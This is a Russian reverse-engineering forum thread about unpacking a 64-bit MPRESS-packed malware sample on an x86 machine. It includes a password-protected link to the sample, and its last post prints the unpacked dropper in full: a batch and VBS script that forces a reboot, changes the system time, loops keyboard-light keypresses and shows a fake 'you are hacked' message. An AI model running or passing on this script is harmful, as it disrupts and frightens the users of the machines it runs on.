Распаковка x64 mpress на x86

Сейчас на форуме: (+8 невидимых)

Посл.ответ	Сообщение
Flint Ранг: 238.8 (наставник), 67thx Активность: 0.2↘0 Статус: Участник CyberHunter	Создано: 19 февраля 2013 13:37 · Личное сообщение · #1 Собственно сабж: есть файл (99% малварный) упакованный mpress, формат PE32+. Как можно его распаковать на x86 тачке? Пробовал переделать в обычный PE: приклеил секции к обычному PE хидеру, поправил все адреса директорий и секций, в итоге файл вроде ровный и даже в олю грузится, но сразу на оеп падает из-за кривого кода: Code: 00416233 PUSH EDI 00416234 PUSH ESI 00416235 PUSH EBX 00416236 PUSH ECX 00416237 PUSH EDX 00416238 INC ECX 00416239 PUSH EAX 0041623A DEC EAX 0041623B LEA EAX,DWORD PTR DS:[ADE] 00416241 DEC EAX 00416242 MOV ESI,DWORD PTR DS:[EAX] ; <<<<< тут падает 00416244 DEC EAX Как быть? http://rghost.ru/43910400 ----- Nulla aetas ad discendum sera

Archer Ранг: 2014.5 (!!!!), 1278thx Активность: 1.34↘0.25 Статус: Модератор retired	Создано: 19 февраля 2013 13:39 · Личное сообщение · #2 Переделать в обычный пе-бессмысленное занятие, хотя бы потому, что инструкции в х64 другие. Либо статик анпакер, либо никак, ищи х64 тачку.
Flint Ранг: 238.8 (наставник), 67thx Активность: 0.2↘0 Статус: Участник CyberHunter	Создано: 19 февраля 2013 13:45 · Личное сообщение · #3 Если нету ни того, ни другого, то забить? ----- Nulla aetas ad discendum sera
Hellspawn Ранг: 990.2 (! ! !), 380thx Активность: 0.68↘0 Статус: Модератор Author of DiE	Создано: 19 февраля 2013 13:46 · Личное сообщение · #4 попросить кого-нить чтоб анпакнули, потом грузить в иду и изучать в статике ----- [nice coder and reverser]
ntldr Ранг: 369.8 (мудрец), 400thx Активность: 0.39↘0 Статус: Участник	Создано: 19 февраля 2013 14:04 · Личное сообщение · #5 Bochs, Qemu. Очень, очень медленно, но если сильно нужно то это вариант. ----- PGP key <0x1B6A24550F33E44A> \| Сообщение посчитали полезным: Flint
Veliant Ранг: 301.4 (мудрец), 194thx Активность: 0.17↘0.01 Статус: Участник	Создано: 19 февраля 2013 14:05 · Личное сообщение · #6 http://rghost.ru/private/43911201/d605ad2cace33ac002c8c8581913c172 пароль virus \| Сообщение посчитали полезным: Flint
redlord Ранг: 33.4 (посетитель), 24thx Активность: 0.02↘0 Статус: Участник	Создано: 19 февраля 2013 14:12 · Личное сообщение · #7 __http://www.hexblog.com/?p=403
Flint Ранг: 238.8 (наставник), 67thx Активность: 0.2↘0 Статус: Участник CyberHunter	Создано: 19 февраля 2013 14:19 · Личное сообщение · #8 Оказалось это был дропер: Code: @echo off del "%0" >nul shutdown -r -t 640 -c "VZLOM SUSTEM" -f >nul time 21:11 >nul echo off echo Chr(39)>%temp%\temp1.vbs echo Chr(39)>%temp%\temp2.vbs echo on error resume next > %temp%\temp.vbs echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs echo set FSO=createobject("scripting.filesystemobject")>>%t emp%\temp.vbs echo do >> %temp%\temp.vbs echo wscript.sleep 200 >> %temp%\temp.vbs echo s.sendkeys"{capslock}">> %temp%\temp.vbs echo wscript.sleep 200 >> %temp%\temp.vbs echo s.sendkeys"{numlock}">> %temp%\temp.vbs echo wscript.sleep 200 >> %temp%\temp.vbs echo s.sendkeys"{scrolllock}">> %temp%\temp.vbs echo loop>> %temp%\temp.vbs start %temp%\temp.vbs start %temp%\temp1.vbs start %temp%\temp2.vbs md GAME OVER msg * "Вы ВЗЛОМАНЫ ваша система будет удалена через 640 секунд!!!!!!!" >nul start Taskmgr start calc ----- Nulla aetas ad discendum sera

Для печати